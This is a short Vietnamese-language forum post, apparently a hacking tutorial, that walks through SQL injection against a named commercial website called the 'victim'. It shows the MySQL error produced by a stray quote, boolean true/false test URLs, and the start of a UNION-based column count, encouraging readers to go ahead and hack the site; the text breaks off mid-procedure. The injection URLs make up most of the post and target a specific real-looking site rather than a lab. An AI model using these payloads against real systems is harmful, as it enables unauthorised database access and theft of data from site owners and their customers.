victim: https://www.185elgin.com/customer_te...timonial_id=25'
Quote:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
select * FROM customer_testimonials WHERE testimonials_id = 25\'
de nhan biet loi nay co hack dc nua ko ta querry them 1 chut nay de nhan biet dc
https://www.185elgin.com/customer_te...timonial_id=25 and 1=1/*
bat ra 1 page voi gia tri true = 1
https://www.185elgin.com/customer_te...timonial_id=25 and 1=0/*
bat ra 1 page voi gia tri false = 0
anh em du dk tren thi tien hanh hack site nha'
bay gio ta di tim site nay co bao nhieu colum de khai thac ra loi
https://www.185elgin.com/customer_te...,3,4,5,6,7,8--
Querry...